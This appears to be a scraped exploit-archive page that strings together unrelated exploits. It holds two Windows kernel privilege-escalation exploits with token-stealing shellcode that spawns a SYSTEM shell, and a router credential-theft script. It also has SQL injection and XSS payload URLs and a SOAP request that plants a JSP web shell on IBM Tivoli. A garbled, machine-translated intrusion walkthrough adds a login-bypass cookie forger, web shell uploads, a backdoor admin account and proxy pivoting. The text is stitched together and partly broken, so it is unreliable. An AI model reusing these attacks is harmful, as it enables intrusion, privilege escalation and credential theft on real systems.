printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "bdagent"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; }
HireHackking
source: https://www.securityfocus.com/bid/48908/info Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information. A remote attacker exploit this issue to obtain sensitive information, possibly aiding in further attacks. #!/bin/bash ######################################### # Exploit Title: Sagem 3304 Routers Get PPPOE Password # Date 27/07/2011 # Author: securititracker@gmail.com # Software Link: null # Version: Sagem Routers F@st 3304 # Tested on: Sagem F@ST 3304 # ######################################### Usage() { echo "Usage : $0 IP_ADDRESS" } if [ "$1" != "" ] then IP_ADDRESS="$1" else Usage exit 1 fi USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' ` USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' ` echo "Username = $USER_NAME ; Passsword = $USER_PASSWORD"
HireHackking

CobraScripts Trading Marketplace Script - 'cid' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48914/info Trading Marketplace script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/selloffers.php?cid=[SQL]
HireHackking

Sitecore CMS 6.4.1 - 'url' Open Redirection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48930/info Sitecore CMS is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks. Sitecore CMS versions 6.4.1 rev. 110324 and prior are vulnerable. http://www.example.com/sitecore/shell/default.aspx?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=0
HireHackking
# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution # Date: 12\12\2014 # Exploit Author: Jakub Palaczynski # Vendor Homepage: http://www.ibm.com/ # Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4 # VU/CVE: VU#782708, CVE-2015-0104 1. Create report 2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum= 3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request: POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1 Host: site Content-Length: xxx <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%> <% try { String cmd; String[] cmdarr; String OS = System.getProperty("os.name"); if (request.getParameter("cmd") != null) { cmd = new String (request.getParameter("cmd")); if (OS.startsWith("Windows")) { cmdarr = new String [] {"cmd", "/C", cmd}; } else { cmdarr = new String [] {"/bin/sh", "-c", cmd}; } Process p = Runtime.getRuntime().exec(cmdarr); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } } catch (Exception e) { e.printStackTrace();} %>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope> 4. Web shell is now ready to use in path specified in __document parameter's value
HireHackking
source: https://www.securityfocus.com/bid/48896/info Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. http://www.example.com/sit/report_marketing.php?mode=report&exc[0]=1'
HireHackking
source: https://www.securityfocus.com/bid/48896/info Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. http://www.example.com/sit/search.php?search_string=1' union select 1,version()
HireHackking
source: https://www.securityfocus.com/bid/48896/info Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. http://www.example.com/sit/tasks.php?selected[]=1'&action=markcomplete
HireHackking
source: https://www.securityfocus.com/bid/48905/info PHPJunkYard GBook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PHPJunkYard GBook 1.7 is vulnerable; other versions may also be affected. http://www.example.com/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E http://www.example.com/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E http://www.example.com/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/comments.php?from=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/comments.php?email=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/comments.php?added=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/admin_tasks.php?task_description=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E http://www.example.com/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E http://www.example.com/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E http://www.example.com/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/emoticons_popup.php?list_emoticons=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E http://www.example.com/templates/default/error.php?myproblem=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/error.php?backlink=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/overall_footer.php?settings[pages_top]=%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[target]=%22%3E%3Cscrip t%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[tpl_path]=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/templates/default/overall_header.php?settings[gbook_title]=%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E http://www.example.com/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%28document.cook
HireHackking
/* Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.avg.com/ Tested Version - 2015.0.5315 Driver Version - 15.0.0.5204 - avgtdix.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/113824 CVE ID - CVE-2014-9632 Vendor fix url - http://www.avg.com/eu-en/avg-release-notes Fixed Version - 2015.0.5557 Fixed driver ver - 15.0.0.5553 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 8678d9a0 8054ccc4 0a050002 8054ccc8 6e66744e 8054cccc 001c0707 8054ccd0 00000180 8054ccd4 000001a4 8054ccd8 867d6690 8054ccdc 86706480 8054cce0 00000000 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 10 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80" // 8054ccd4 805c4ae5 nt!IoReadPartitionTable "\x7b\x3f\x61\x80" // 8054ccd8 80613f7b nt!IoSetPartitionInformation "\xef\x41\x61\x80" // 8054ccdc 806141ef nt!IoWritePartitionTable "\x57\xd1\x52\x80"; // 8054cce0 8052d157 nt!CcHasInactiveViews DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "avgtdi"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; }
HireHackking
イントラネットローミングトポロジ図3は、ログインバイパスの脆弱性を使用してバックエンドターゲットWebサイトIPを実行します。192.168.31.55、ターゲットWebサイトIPをローカルホストファイルの下でwww.test.comに結合します(IP Webサイトへの直接アクセスをIP Webサイトへの読み込みからの荷物Webサイトに訪問します。
クリック後、WebサイトがFoosuncmsによって構築されていることがわかりました。クリックした後、WebサイトがFoosuncmsによって構築されていることがわかりました。
バージョンはV2.0であり、悪用できる脆弱性があります。管理者アカウント情報の確認をバイパスし、背景を直接入力します。それは非常に危険なエクスプロイトであると言えます。 Webサイトのバックエンドアドレスにアクセスしてください:/Manage/index.aspx
検索では、Foosuncms v2.0にはログインバイパスの脆弱性があることがわかりました。バイパスをログインしてみてください。以下のリンクにアクセスして、usernumberを取得してください
http://www.test.com/user/city_ajax.aspx?cityid=1%27%20Union%20All%20Seerect%20Usernum、%20dbo.fs_sys_user%20where%20where%20username=%27admin 正常に
SQLインジェクションを使用してusernumberを取得し、ユーザー名などでスプライスし、Cookieを構築し、管理者の特権で直接ログインします。 EXPコードは次のとおりです。
#Coding:UTF-8Import Argparseimport urllibimport tracebackimport base6444rom crypto.cipher import aesfrom binascii import b2a_hex ##############################################################################################################################################キーワード:#### inurl:/manage/login.aspx #############################################################(%hj7x89h $ yubi0456ftmat5fvhufcy76*h%(hilj $ lhj!yiv) 'e4ghj*ghg7!rnifb95guy86gfghub#er57hbh(u%g6hj($ jhwk7!hg4ui%$ hjk'def parse_args(): parser=argperse.argumentparser()parser.add_argument(' -u '' '' '' '' '' '' '' '' '-u' '' -u url '、必須=true、nargs='+')parser.parse_args()def run(url): try: usernumber=get_usernumber(url)usernumberがいない場合は: encrypt_cookie=generate_cookie(usernumber) Exception: traceback.print_exc()def get_usernumber(url): fullurl=url + '/user/city_ajax.aspx?cityid=1'すべての選択usernum、usernum、usernum from dbo.fs_sys_user where username='content " value=\ '')index!=-1: usernumber=content [index+15:] usernumber=usernumber [0: content.index( '\' ')+1] print' usernumber成功を取得します。 usernumberは: '、usernumber return usernumber else: print' get usernumber fail 'return nonedef pkcs7padding(data) orgstr='%s、admin、0,1、false'%(usernumber、)crypor=aes.new(key [0336032]、aes.mode_cbc、iv [0:16])ciphertext=cryptor.encrypt(pkcs7padding(orgstr))ciphertext(ciphertext) ciphertextdef write_cookie(url、ciphercookie): print 'generate cookie [siteinfo] :'、ciphercookie print 'Cookieを書いて、URL3360%s/manage s/manage/index.aspx'%(url、)if(url、)if __name __=============parse_args()try: if args.url is no no: run(args.url [0])例外を除いて、e: print 'python foosun_exp.py -u [url]' ''を実行した後、暗号化されたバイヤンスログインクッキーが正常に取得されました。
編集クッキーを使用して、スクリプトによってブラウザクッキーに印刷された暗号化されたクッキーを書き込む
次に、http://www.test.com/manage/index.aspxにアクセスして、背景を正常に入力します
注:EXPスクリプトの実行時に次の状況が発生した場合、Python crypto.cipher暗号化パッケージをインストールする必要があります
暗号化パッケージをインストールします
pipinstallpycryptodomeは、ファイルアップロードの脆弱性を使用してシェルを取得し、背景に入ります。コントロールパネルシステムパラメーター設定を入力した後、アップロードポイントでアップロードファイルを変更できることがわかり、ASPX形式を追加できます。
ファイルは、プラグインマネジメント広告システムにアップロードできます。 ASPXの1つのセンテンススクリプトをアップロードしてみてください。上にアップロードされたファイルパスに正常にアップロードされて返されることがわかりました。 SQLMAPを使用してインタラクティブなシェルを取得し、上記の注入ポイントをSQLMAPに入れて実行してくださいhttp://www.test.com/user/city_ajax.aspx?cityid=1%27%20Union%20All%20Select%20USERNUM、%20DBO.FS_SYS_USER%20 WHERE%20USERNAME=%27Admin sqlmap shellsqlmap.py-u'http://www.test.com/user/city_ajax.aspx?cityid=1%27%20 yion%20all%20 select%20usernum、usernum%20 from%20dbo.fs_sys_user%20where%20usernameシステム許可はSQLMAPを作成しようとするSQLMAPトロイの木馬(補足:脱出問題に注意を払う)複雑さが強化されます。ユーザーをもう一度追加すると、コマンドの実行が成功し、追加のユーザーが管理者グループUSE SQLMAPインタラクティブシェルに追加されて、ホストIPが192.168.31.55ではなく192.168.1.123であることがわかります。次に、同じネットワークセグメントにないIPが同じネットワークセグメントに転送される可能性があります。別のイントラネットに侵入してイントラネットをローミングするためにプロキシを設定します。チェックを通じて、ポート3389を開設し、以前に追加された管理者アカウントパスワードを使用して3389にログインすることがわかりました。 2つのアカウントパスワードを見つけた管理者管理者ユーザーのデスクトップにメモ帳があることがわかりました。
発見されたアカウントを使用して、www.test.comポート:8080のルーティングインターフェイスにログインして、IPログインを制限するポート:080のルーティングインターフェイスにログインします。イントラネットIPログインのみを設定できる可能性があると推測しました。次に、ローカルでプロキシをセットアップした後、ログインしました。イントラネットルーティングWebサイトであることがわかりました。ルートにログインした後、ルーターの下に172.19.23.123のウェブサイトがあることがわかりました。ここでは、KaliのRegeorge+Proxychains Proxyを使用して、イントラネット浸透を実行します。最初に、プロキシチェーンの構成ファイルを設定し、Kali端子を開き、次のコマンドを入力し、vi /etc/proxychains.conf のdynamic_chain#の前にコメント文字を削除します。 pythonregeorgsocksproxy.py-p23333-l0.0.0.0-uhttp://www.test.com/files/tunnel.aspx

プロキシを使用して、Firefoxブラウザを開きます。注:コマンドの前にproxychainsを追加=プロキシを使用してこのコマンドを実行しますproxychainsfirefox

上記で見つけたアカウントパスワードを使用して、Webサイトにログインしました。は、このWebサイトがUメールであることを発見しました。非常に深刻なファイルのアップロード脆弱性がUメールで発生することがわかりました。このウェブサイトがこの脆弱性を修正したかどうかを試すことができます。 EXPコードは次のとおりです。MetaHTTP-Equiv='Content-Type' content='text/html; charset=utf-8 '/form name=form1 method=post action=' http://172.19.23.123/webmail/client/mail/index.php?module=operateactype=attach-upload 'enctype=multipart/form-dataの入力タイプ='ファイル構築されたHTMLページを開き、サフィックスJPGでPHPマレーシアをアップロードするためのプロキシ

アップロードが成功した後、ファイルfile_id情報が表示されます。次のペイロードを使用して、3333338172.19.23.123の現在ログインしているユーザー_IDを取得します。アップロードされたマレーシアファイルパス、およびPHP解像度の脆弱性を使用します。パスが追加された後、 /.phpが追加された後、
要約
1。ターゲットシステムのWebポートにアクセスし、オンライン指紋認識を介してターゲットシステムのCMSシステムを照会してFOOSUNCMSに照会します。 Webサイトのバックグラウンドインジェクションの脆弱性には歴史的な脆弱性があり、バージョンはv2.0http://www.test.com2です。次のアドレスにアクセスして、管理者のusernumber3http://www.test.com/user/city_ajax.aspx?cityid=1%27%20union%20All20Select%20usernum %20from%20dbo.fs_sys_user%20どこにいてください。背景に直接アクセスするページhttp://www.test.com/manage/index.aspx4。 SQLインジェクションを直接使用してusernumberを取得し、ユーザー名などでスプライスし、Cookieを構築し、管理者の特権で直接ログインします。 EXPコードは次のとおりです。#Coding:UTF-8IMPORT ArgParseimport urllibimport tracebackimport base644rom crypto.cipher imp
HireHackking

Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change

